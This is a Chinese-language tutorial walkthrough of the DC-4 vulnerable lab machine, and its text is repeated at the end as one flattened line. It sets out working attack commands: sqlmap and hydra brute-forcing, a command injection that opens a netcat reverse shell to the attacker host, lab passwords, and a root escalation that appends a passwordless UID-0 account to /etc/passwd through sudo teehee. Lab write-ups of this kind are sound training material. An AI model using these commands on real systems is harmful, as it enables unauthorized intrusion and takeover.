DC-4靶机复现
字数 1092 2025-08-30 06:50:27

DC-4靶机渗透测试教学文档

1. 环境准备与信息收集

1.1 确定目标IP地址

使用arp-scan工具扫描局域网内靶机的MAC地址和IP地址:

arp-scan -l

1.2 目标识别

通过扫描结果确定靶机的IP地址(示例中为192.168.130.144)

2. Web应用渗透

2.1 登录页面分析

  • 访问目标IP的Web端,发现需要账号密码的登录页面
  • 可能的攻击途径:
    • SQL注入
    • 弱口令爆破

2.2 SQL注入尝试

使用sqlmap工具测试SQL注入漏洞:

sqlmap -u 192.168.130.144 --data="username=a&password=a"

如果注入不成功,转向爆破尝试

2.3 弱口令爆破

策略:

  • 固定用户名:admin
  • 使用密码字典进行爆破
  • 成功获取凭证:admin/happy

3. 获取初始访问权限

3.1 反弹Shell

  • 登录后发现可以执行命令
  • 通过修改radio参数实现命令注入:
nc 192.168.130.128 4444 -e /bin/bash
  • 在攻击机上开启监听:
nc -lvnp 4444

3.2 升级交互式Shell

获取基本shell后,升级为完全交互式shell:

python -c "import pty;pty.spawn('/bin/bash')"

4. 横向移动

4.1 用户枚举

在系统中发现三个用户:

  • Charles
  • jim
  • sam

4.2 密码发现

在jim的备份目录中发现旧密码文件:

ls /home
cd /home/jim
ls
cd backups
ls
cat old-passwords.bak

4.3 SSH爆破

使用hydra对jim账户进行SSH爆破:

hydra -l jim -P passwd.txt 192.168.130.144 ssh

成功爆破出密码:jibril04

4.4 登录jim账户

ssh jim@192.168.130.144

4.5 邮件信息收集

检查jim的邮箱文件:

ls
cat mbox

查看系统邮件目录:

cd /var/spool/mail

发现Charles发给jim的邮件,包含Charles的密码:^xHhA&hvim0y

4.6 登录Charles账户

注意用户名大小写:

ssh charles@192.168.130.144

5. 权限提升

5.1 检查sudo权限

sudo -l

发现可以使用teehee命令以root权限执行

5.2 teehee提权

teehee是一个小众的Linux编辑器,可以利用其sudo权限修改/etc/passwd文件:

echo "zh1yu::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su zh1yu

原理:

  • 在passwd文件中添加一个UID为0的用户
  • 无shadow条目且密码为空时,可直接su登录
  • UID为0即获得root权限

6. 获取flag

6.1 查找flag文件

find / -name flag*

6.2 读取flag

cat /root/flag.txt

7. 总结

7.1 渗透路径

  1. Web登录页面弱口令爆破
  2. 命令注入获取反弹shell
  3. 信息收集发现用户和密码
  4. SSH爆破横向移动
  5. 邮件信息发现高权限账户
  6. sudo提权获取root权限

7.2 关键知识点

  • arp-scan用于局域网主机发现
  • sqlmap进行SQL注入测试
  • hydra进行SSH爆破
  • 反弹shell技术
  • sudo权限滥用提权
  • /etc/passwd文件格式与权限机制

7.3 防御建议

  • 使用强密码策略
  • 限制sudo权限
  • 关闭不必要的服务
  • 定期检查系统邮件和备份文件
  • 实施最小权限原则
DC-4靶机渗透测试教学文档 1. 环境准备与信息收集 1.1 确定目标IP地址 使用arp-scan工具扫描局域网内靶机的MAC地址和IP地址: 1.2 目标识别 通过扫描结果确定靶机的IP地址(示例中为192.168.130.144) 2. Web应用渗透 2.1 登录页面分析 访问目标IP的Web端,发现需要账号密码的登录页面 可能的攻击途径: SQL注入 弱口令爆破 2.2 SQL注入尝试 使用sqlmap工具测试SQL注入漏洞: 如果注入不成功,转向爆破尝试 2.3 弱口令爆破 策略: 固定用户名:admin 使用密码字典进行爆破 成功获取凭证:admin/happy 3. 获取初始访问权限 3.1 反弹Shell 登录后发现可以执行命令 通过修改radio参数实现命令注入: 在攻击机上开启监听: 3.2 升级交互式Shell 获取基本shell后,升级为完全交互式shell: 4. 横向移动 4.1 用户枚举 在系统中发现三个用户: Charles jim sam 4.2 密码发现 在jim的备份目录中发现旧密码文件: 4.3 SSH爆破 使用hydra对jim账户进行SSH爆破: 成功爆破出密码:jibril04 4.4 登录jim账户 4.5 邮件信息收集 检查jim的邮箱文件: 查看系统邮件目录: 发现Charles发给jim的邮件,包含Charles的密码:^xHhA&hvim0y 4.6 登录Charles账户 注意用户名大小写: 5. 权限提升 5.1 检查sudo权限 发现可以使用teehee命令以root权限执行 5.2 teehee提权 teehee是一个小众的Linux编辑器,可以利用其sudo权限修改/etc/passwd文件: 原理: 在passwd文件中添加一个UID为0的用户 无shadow条目且密码为空时,可直接su登录 UID为0即获得root权限 6. 获取flag 6.1 查找flag文件 6.2 读取flag 7. 总结 7.1 渗透路径 Web登录页面弱口令爆破 命令注入获取反弹shell 信息收集发现用户和密码 SSH爆破横向移动 邮件信息发现高权限账户 sudo提权获取root权限 7.2 关键知识点 arp-scan用于局域网主机发现 sqlmap进行SQL注入测试 hydra进行SSH爆破 反弹shell技术 sudo权限滥用提权 /etc/passwd文件格式与权限机制 7.3 防御建议 使用强密码策略 限制sudo权限 关闭不必要的服务 定期检查系统邮件和备份文件 实施最小权限原则